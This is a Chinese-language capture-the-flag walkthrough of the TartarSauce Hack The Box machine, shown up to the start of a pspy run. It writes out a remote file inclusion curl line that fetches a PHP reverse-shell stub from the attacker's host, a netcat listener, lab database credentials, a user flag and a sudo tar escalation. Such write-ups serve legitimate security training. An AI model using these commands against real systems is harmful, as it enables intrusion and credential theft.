TartarSauce-htb-writeup

0x00 靶场技能介绍

章节技能:识别兔子洞、robots.txt 目录泄露、目录扫描、wordpress插件漏洞、Gwolle Guestbook 插件漏洞、sudo -l 、/bin/tar 利用、pspy 工具使用、脚本分析错配利用

参考链接:https://0xdf.gitlab.io/2018/10/20/htb-tartarsauce.html

参考链接:https://thadigus.gitlab.io/htb-writeups/2022-02-17-Tartarsauce-HTB-Writeup/

0x01 用户权限获取

1、获取下靶机IP地址:10.10.10.88

2、扫描下开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn --min-rate=10000 -oG allport1 10.10.10.88 
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 22:38 CST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.27s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 19.11 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sC -sV -p80 -Pn --min-rate=10000 -oG allport 10.10.10.88
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 22:39 CST
Nmap scan report for 10.10.10.88
Host is up (0.27s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
| /webservices/tar/tar/source/ 
| /webservices/monstra-3.0.4/ /webservices/easy-file-uploader/ 
|_/webservices/developmental/ /webservices/phpmyadmin/
|_http-title: Landing Page
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- -Pn -sU --min-rate=10000 -oG allport2 10.10.10.88  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-06 22:40 CST
Warning: 10.10.10.88 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.88
Host is up (0.30s latency).
All 65535 scanned ports on 10.10.10.88 are in ignored states.
Not shown: 65467 open|filtered udp ports (no-response), 68 closed udp ports (port-unreach)

Nmap done: 1 IP address (1 host up) scanned in 75.10 seconds

3、查看下80端口首页的内容

http://10.10.10.88/

4、没有什么发现,那就看一下 robots.txt 文件内容吧

1
2
3
4
5
6
7
8
┌──(kali㉿kali)-[~/桌面]
└─$ curl http://10.10.10.88/robots.txt     
User-agent: *
Disallow: /webservices/tar/tar/source/
Disallow: /webservices/monstra-3.0.4/
Disallow: /webservices/easy-file-uploader/
Disallow: /webservices/developmental/
Disallow: /webservices/phpmyadmin/

5、这里有一些信息,进行尝试访问后,只有1个路径可以正常访问

/webservices/monstra-3.0.4/

6、通过右下角,可以知道当前CMS的版本,顾使用 searchsploit 进行exp的寻找并利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit monstra 3.0.4                                     
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)      | php/webapps/51519.txt
Monstra CMS 3.0.4 - (Authenticated) Arbitrary File Upl | php/webapps/43348.txt
Monstra CMS 3.0.4 - Arbitrary Folder Deletion          | php/webapps/44512.txt
Monstra CMS 3.0.4 - Authenticated Arbitrary File Uploa | php/webapps/48479.txt
Monstra cms 3.0.4 - Persitent Cross-Site Scripting     | php/webapps/44502.txt
Monstra CMS 3.0.4 - Remote Code Execution (Authenticat | php/webapps/49949.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (1)         | php/webapps/44855.py
Monstra CMS < 3.0.4 - Cross-Site Scripting (2)         | php/webapps/44646.txt
Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Accoun | php/webapps/45164.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/49949.py
  Exploit: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated)
      URL: https://www.exploit-db.com/exploits/49949
     Path: /usr/share/exploitdb/exploits/php/webapps/49949.py
    Codes: CVE-2018-6383
 Verified: False
File Type: ASCII text, with very long lines (18247)
Copied to: /home/kali/桌面/49949.py

这个脚本是需要登录后才能利用,但是

http://10.10.10.88/webservices/monstra-3.0.4/admin/

http://10.10.10.88/webservices/monstra-3.0.4/admin/index.php?id=pages

7、发现该网站上的漏洞并无法利用,这里可能就是个兔子洞,顾放弃,继续进行目录扫描,这里分别扫描了根目录和已知目录下的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.88            
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3                                                         
 (_||| _) (/_(_|| (_| )                                                                  
                                                                                         
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.88/_24-01-06_22-56-35.txt

Target: http://10.10.10.88/

[22:56:35] Starting:                                                                     
[22:56:50] 403 -  300B  - /.htaccess.bak1                                   
[22:56:50] 403 -  302B  - /.htaccess.sample                                 
[22:56:50] 403 -  300B  - /.htaccess.orig                                   
[22:56:50] 403 -  300B  - /.htaccess.save
[22:56:50] 403 -  300B  - /.htaccess_orig                                   
[22:56:50] 403 -  301B  - /.htaccess_extra
[22:56:50] 403 -  298B  - /.htaccess_sc
[22:56:50] 403 -  298B  - /.htaccessBAK
[22:56:50] 403 -  298B  - /.htaccessOLD
[22:56:50] 403 -  299B  - /.htaccessOLD2
[22:56:50] 403 -  290B  - /.htm                                             
[22:56:50] 403 -  291B  - /.html
[22:56:50] 403 -  297B  - /.ht_wsr.txt                                      
[22:56:50] 403 -  300B  - /.htpasswd_test                                   
[22:56:50] 403 -  297B  - /.httr-oauth
[22:56:50] 403 -  296B  - /.htpasswds                                       
[22:56:54] 403 -  290B  - /.php                                             
[22:56:54] 403 -  291B  - /.php3                                            
[22:58:48] 200 -  128B  - /robots.txt                                       
[22:58:51] 403 -  299B  - /server-status                                    
[22:58:51] 403 -  300B  - /server-status/
                                                                             
Task Completed



┌──(kali㉿kali)-[~/桌面]
└─$ dirsearch -u http://10.10.10.88/webservices/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/桌面/reports/http_10.10.10.88/_webservices__24-01-06_23-00-03.txt

Target: http://10.10.10.88/

[23:00:03] Starting: webservices/
[23:00:18] 403 -  309B  - /webservices/.ht_wsr.txt                          
[23:00:19] 403 -  312B  - /webservices/.htaccess.bak1                       
[23:00:19] 403 -  312B  - /webservices/.htaccess.orig
[23:00:19] 403 -  314B  - /webservices/.htaccess.sample
[23:00:19] 403 -  312B  - /webservices/.htaccess.save                       
[23:00:19] 403 -  313B  - /webservices/.htaccess_extra                      
[23:00:19] 403 -  312B  - /webservices/.htaccess_orig
[23:00:19] 403 -  310B  - /webservices/.htaccess_sc                         
[23:00:19] 403 -  310B  - /webservices/.htaccessBAK
[23:00:19] 403 -  310B  - /webservices/.htaccessOLD
[23:00:19] 403 -  311B  - /webservices/.htaccessOLD2
[23:00:19] 403 -  302B  - /webservices/.htm                                 
[23:00:19] 403 -  303B  - /webservices/.html                                
[23:00:19] 403 -  312B  - /webservices/.htpasswd_test                       
[23:00:19] 403 -  309B  - /webservices/.httr-oauth                          
[23:00:19] 403 -  308B  - /webservices/.htpasswds                           
[23:00:23] 403 -  302B  - /webservices/.php                                 
[23:00:23] 403 -  303B  - /webservices/.php3                                
[23:02:37] 301 -  319B  - /webservices/wp  ->  http://10.10.10.88/webservices/wp/
[23:02:39] 200 -    1KB - /webservices/wp/wp-login.php                      
[23:02:39] 200 -    3KB - /webservices/wp/
                                                                             
Task Completed

8、通过这一轮的扫描,发现了一些信息,尝试访问下

http://10.10.10.88/webservices/wp/

9、通过查看网站源码,发现了一个域名,本地也绑定下

1
2
3
4
┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.88 tartarsauce.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.88 tartarsauce.htb

10、由于目标是 wordpress ,故使用 wpscan 进行扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
┌──(kali㉿kali)-[~/桌面]
└─$ wpscan --url http://10.10.10.88/webservices/wp/
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://10.10.10.88/webservices/wp/ [10.10.10.88]
[+] Started: Sat Jan  6 23:06:17 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.10.88/webservices/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.10.88/webservices/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.10.88/webservices/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.9.4 identified (Insecure, released on 2018-02-06).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.10.10.88/webservices/wp/, Match: 'WordPress 4.9.4'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:10 <=======================> (137 / 137) 100.00% Time: 00:00:10

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Jan  6 23:06:38 2024
[+] Requests Done: 173
[+] Cached Requests: 4
[+] Data Sent: 46.379 KB
[+] Data Received: 12.671 MB
[+] Memory used: 228.215 MB
[+] Elapsed time: 00:00:20

11、由于靶机是2018年的靶机,wpscan扫描没有发现什么插件上的问题,故参考下演练报告

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
=== Gwolle Guestbook ===
Contributors: Gwolle, mpol
Tags: guestbook, guest book, comments, feedback, antispam, review, gastenboek, livre d'or, Gästebuch, libro de visitas, livro de visitas
Requires at least: 3.7
Tested up to: 4.4
Stable tag: 2.3.10
License: GPLv2 or later

Gwolle Guestbook is the WordPress guestbook you've just been looking for. Beautiful and easy.


== Changelog ==

= 2.3.10 =
* 2018-2-12
* Changed version from 1.5.3 to 2.3.10 to trick wpscan ;D

12、使用 searchsploit 进行搜索这个版本的漏洞

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Gwolle Guestbook v 1.5.3
------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- ---------------------------------
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion    | php/webapps/38861.txt
------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m php/webapps/38861.txt
  Exploit: WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/38861
     Path: /usr/share/exploitdb/exploits/php/webapps/38861.txt
    Codes: CVE-2015-8351, OSVDB-129197
 Verified: False
File Type: Unicode text, UTF-8 text, with very long lines (392)
Copied to: /home/kali/桌面/38861.txt

13、参考漏洞利用的代码进行尝试

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿kali)-[~/桌面]
└─$ curl http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80                          
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [06/Jan/2024 23:37:44] code 404, message File not found
10.10.10.88 - - [06/Jan/2024 23:37:44] "GET /wp-load.php HTTP/1.0" 404 -
10.10.10.88 - - [06/Jan/2024 23:37:55] code 404, message File not found
10.10.10.88 - - [06/Jan/2024 23:37:55] "GET /wp-load.php HTTP/1.0" 404 -

14、发现本地确实有访问请求,请求了本地的 /wp-load.php 文件,这里写一个木马,名字就是 wp-load.php

1
2
3
4
5
6
7
8
9
10
11
12
cat wp-load.php

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.5';  // CHANGE THIS
$port = 443;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

15、尝试漏洞利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面]
└─$ curl http://tartarsauce.htb/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.14.5/

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.88 - - [06/Jan/2024 23:42:12] "GET /wp-load.php HTTP/1.0" 200 -

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.88] 37484
Linux TartarSauce 4.15.0-041500-generic #201802011154 SMP Thu Feb 1 12:05:23 UTC 2018 i686 i686 i686 GNU/Linux
 10:42:13 up  1:08,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$

16、可以看到成功获取到一个初始的shell环境,然后我就开始翻网站配置,翻数据,各种翻,但是这里确是个兔子洞,这个靶机的兔子洞还是不少的啊!!!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@TartarSauce:/$ 

www-data@TartarSauce:/$ pwd
pwd
/
www-data@TartarSauce:/$ cd /var/www     
cd /var/www
www-data@TartarSauce:/var/www$ ls
ls
html
www-data@TartarSauce:/var/www$ cd html
cd html
www-data@TartarSauce:/var/www/html$ ls
ls
index.html  robots.txt  webservices
www-data@TartarSauce:/var/www/html$ cd webservices
cd webservices
www-data@TartarSauce:/var/www/html/webservices$ ls
ls
monstra-3.0.4  wp
www-data@TartarSauce:/var/www/html/webservices$ cd monstra-3.0.4
cd monstra-3.0.4
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4$ ls
ls
CHANGELOG.md  admin    engine       index_copy.php  public      sitemap.xml
LICENSE.md    backups  favicon.ico  libraries       robots.txt  storage
README.md     boot     index.php    plugins         rss.php     tmp
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4$ cd admin
cd admin
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4/admin$ ls
ls
index.php  themes
www-data@TartarSauce:/var/www/html/webservices/monstra-3.0.4/admin$ cd ../../../
<ww/html/webservices/monstra-3.0.4/admin$ cd ../../../                       
www-data@TartarSauce:/var/www/html$ ls
ls
index.html  robots.txt  webservices
www-data@TartarSauce:/var/www/html$ cd webservices
cd webservices
www-data@TartarSauce:/var/www/html/webservices$ ls
ls
monstra-3.0.4  wp
www-data@TartarSauce:/var/www/html/webservices$ cd wp
cd wp
www-data@TartarSauce:/var/www/html/webservices/wp$ ls
ls
index.php        wp-blog-header.php        wp-cron.php        wp-mail.php
license.txt      wp-comments-post.php      wp-includes        wp-settings.php
readme.html      wp-config-sample.php.bkp  wp-links-opml.php  wp-signup.php
wp-activate.php  wp-config.php             wp-load.php        wp-trackback.php
wp-admin         wp-content                wp-login.php       xmlrpc.php
www-data@TartarSauce:/var/www/html/webservices/wp$ cat wp-config.php
cat wp-config.php
<?php
/**
 * The base configuration for WordPress
 *
 * The wp-config.php creation script uses this file during the
 * installation. You don't have to use the web site, you can
 * copy this file to "wp-config.php" and fill in the values.
 *
 * This file contains the following configurations:
 *
 * * MySQL settings
 * * Secret keys
 * * Database table prefix
 * * ABSPATH
 *
 * @link https://codex.wordpress.org/Editing_wp-config.php
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp');

/** MySQL database username */
define('DB_USER', 'wpuser');

/** MySQL database password */
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');

/**#@+
 * Authentication Unique Keys and Salts.
 *
 * Change these to different unique phrases!
 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
 *
 * @since 2.6.0
 */
define('AUTH_KEY',         'put your unique phrase here');
define('SECURE_AUTH_KEY',  'put your unique phrase here');
define('LOGGED_IN_KEY',    'put your unique phrase here');
define('NONCE_KEY',        'put your unique phrase here');
define('AUTH_SALT',        'put your unique phrase here');
define('SECURE_AUTH_SALT', 'put your unique phrase here');
define('LOGGED_IN_SALT',   'put your unique phrase here');
define('NONCE_SALT',       'put your unique phrase here');

/**#@-*/

/**
 * WordPress Database Table prefix.
 *
 * You can have multiple installations in one database if you give each
 * a unique prefix. Only numbers, letters, and underscores please!
 */
$table_prefix  = 'wp_';

/**
 * For developers: WordPress debugging mode.
 *
 * Change this to true to enable the display of notices during development.
 * It is strongly recommended that plugin and theme developers use WP_DEBUG
 * in their development environments.
 *
 * For information on other constants that can be used for debugging,
 * visit the Codex.
 *
 * @link https://codex.wordpress.org/Debugging_in_WordPress
 */
define('WP_DEBUG', false);
define('WP_HOME', 'http://tartarsauce.htb/webservices/wp');
define('WP_SITEURL', 'http://tartarsauce.htb/webservices/wp');
/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
        define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
www-data@TartarSauce:/var/www/html/webservices/wp$ 

-----------------------------------------------------------

define('DB_NAME', 'wp');

/** MySQL database username */
define('DB_USER', 'wpuser');

/** MySQL database password */
define('DB_PASSWORD', 'w0rdpr3$$d@t@b@$3@cc3$$');

mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'show tables'

mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'describe wp_users'

mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'select user_login,user_pass from wp_users'


www-data@TartarSauce:/var/www/html/webservices/wp$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 May 12  2022 .
drwxr-xr-x 22 root  root  4096 May 12  2022 ..
drwxrw----  5 onuma onuma 4096 May 12  2022 onuma
www-data@TartarSauce:/var/www/html/webservices/wp$ 

www-data@TartarSauce:/var/www/html/webservices/wp$ mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'show tables'
<sql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'show tables' 
mysql: [Warning] Using a password on the command line interface can be insecure.
+-----------------------+
| Tables_in_wp          |
+-----------------------+
| wp_commentmeta        |
| wp_comments           |
| wp_gwolle_gb_entries  |
| wp_gwolle_gb_log      |
| wp_links              |
| wp_options            |
| wp_postmeta           |
| wp_posts              |
| wp_term_relationships |
| wp_term_taxonomy      |
| wp_termmeta           |
| wp_terms              |
| wp_usermeta           |
| wp_users              |
+-----------------------+
www-data@TartarSauce:/var/www/html/webservices/wp$ mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'describe wp_users'
<='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'describe wp_users'                     
mysql: [Warning] Using a password on the command line interface can be insecure.
+---------------------+---------------------+------+-----+---------------------+----------------+
| Field               | Type                | Null | Key | Default             | Extra          |
+---------------------+---------------------+------+-----+---------------------+----------------+
| ID                  | bigint(20) unsigned | NO   | PRI | NULL                | auto_increment |
| user_login          | varchar(60)         | NO   | MUL |                     |                |
| user_pass           | varchar(255)        | NO   |     |                     |                |
| user_nicename       | varchar(50)         | NO   | MUL |                     |                |
| user_email          | varchar(100)        | NO   | MUL |                     |                |
| user_url            | varchar(100)        | NO   |     |                     |                |
| user_registered     | datetime            | NO   |     | 0000-00-00 00:00:00 |                |
| user_activation_key | varchar(255)        | NO   |     |                     |                |
| user_status         | int(11)             | NO   |     | 0                   |                |
| display_name        | varchar(250)        | NO   |     |                     |                |
+---------------------+---------------------+------+-----+---------------------+----------------+
www-data@TartarSauce:/var/www/html/webservices/wp$ mysql -u 'wpuser' --password='w0rdpr3$$d@t@b@$3@cc3$$' -D wp -e 'select user_login,user_pass from wp_users'
< -D wp -e 'select user_login,user_pass from wp_users'                       
mysql: [Warning] Using a password on the command line interface can be insecure.
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| wpadmin    | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 |
+------------+------------------------------------+
www-data@TartarSauce:/var/www/html/webservices/wp$

17、这里尝试看下 home 目录下的文件吧

1
2
3
4
5
6
7
8
9
10
11
12
www-data@TartarSauce:/var/www/html/webservices/wp$ ls -la /home
ls -la /home
total 12
drwxr-xr-x  3 root  root  4096 May 12  2022 .
drwxr-xr-x 22 root  root  4096 May 12  2022 ..
drwxrw----  5 onuma onuma 4096 May 12  2022 onuma
www-data@TartarSauce:/var/www/html/webservices/wp$ 

www-data@TartarSauce:/var/www/html/webservices/wp$ ls -la /home/onuma
ls -la /home/onuma
ls: cannot open directory '/home/onuma': Permission denied
www-data@TartarSauce:/var/www/html/webservices/wp$

18、那尝试下 sudo -l 命令

1
2
3
4
5
6
7
8
9
www-data@TartarSauce:/var/www/html/webservices/wp$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/var/www/html/webservices/wp$

19、发现了一个可以利用的点,这里通过 gtfobins 的方法,直接获取到该用户的权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
www-data@TartarSauce:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
www-data@TartarSauce:/$ sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
<ll /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash              
tar: Removing leading `/' from member names
onuma@TartarSauce:/$ id
id
uid=1000(onuma) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)

20、获取下user的flag信息

1
2
3
4
5
6
7
8
9
onuma@TartarSauce:/$ cd ~
cd ~
onuma@TartarSauce:~$ ls
ls
shadow_bkp  user.txt
onuma@TartarSauce:~$ cat user.txt
cat user.txt
09368066008f72bebba5bac1ec692982
onuma@TartarSauce:~$

0x02 系统权限获取

21、通过初始的各种信息枚举,没有发现了什么疑似点,这里本地上传个 pspy 进行分析下,看看有其他运行的程序没有

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿kali)-[~/桌面/htb-tools/pspy]
└─$ python3 -m http.server 8080                        
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
10.10.10.88 - - [07/Jan/2024 00:06:01] "GET /pspy64 HTTP/1.1" 200 -

onuma@TartarSauce:~$ wget http://10.10.14.5:8080/pspy32
wget http://10.10.14.5:8080/pspy32
--2024-01-06 11:06:01--  http://10.10.14.5:8080/pspy32
Connecting to 10.10.14.5:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy32'

pspy64              100%[===================>]   2.96M  1.18MB/s    in 2.5s    

2024-01-06 11:06:04 (1.18 MB/s) - 'pspy32' saved [3104768/3104768]

onuma@TartarSauce:~$

22、尝试运行程序

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
onuma@TartarSauce:~$ chmod +x pspy32
chmod +x pspy32
onuma@TartarSauce:~$ ./pspy32
./pspy32
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d


     ██▓███    ██████  ██▓███ ▓██   ██▓
    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
